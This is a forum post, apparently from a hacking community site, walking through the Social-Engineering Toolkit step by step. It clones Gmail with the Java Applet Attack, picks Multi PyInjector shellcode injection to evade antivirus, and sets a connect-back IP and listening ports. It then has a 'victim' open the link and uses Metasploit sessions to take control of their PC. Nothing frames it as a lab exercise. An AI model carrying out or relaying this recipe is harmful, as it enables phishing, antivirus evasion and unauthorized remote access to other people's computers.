• We just launched and are currently in beta. Join us as we build and grow the community.

Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit

Jiglife101

Crypto Ecosystem Analyst
J Rep
0
0
0
Rep
0
J Vouches
0
0
0
Vouches
0
Posts
165
Likes
159
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

1.jpg


Now we will choose option 5, “Update the Social-Engineering Toolkit”

2.jpg


Now we will choose option 1, “Social-Engineering Attacks”

4.jpg


Now we will choose option 2, “Website Attack Vectors”

5.jpg


Now we will choose the option 1 the Java Applet Attack Method

6.jpg


Now we will choose option 2, “Site Cloner”

Are you using NAT/PORT Forwarding: no

Enter the IP address to connect back on: 192.168.1.3 (IP address of Your PC)

Enter the URL to clone://www.gmail.com(but you can use any website to run the Java Applet)

7.jpg


Now choose 16 “Multi PyInjector Shellcode Injection”,

8.jpg


Port of the attacker computer. In this example I use port 443

Select the payload you want to deliver via shellcodeexec press enter here

9.jpg


Now again select Port of the attacker computer. In this example I use port 444 and 445

Select the payload you want to deliver via shellcodeexec press enter here

10.jpg


Now it creates the backdoor program, encodes and packs. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:

11.jpg


Now an URL you should give to your victim //192.168.1.3

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

12.jpg


13.jpg


14.jpg


You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

15.jpg


16.jpg
 

438,530

315,663

315,672

Top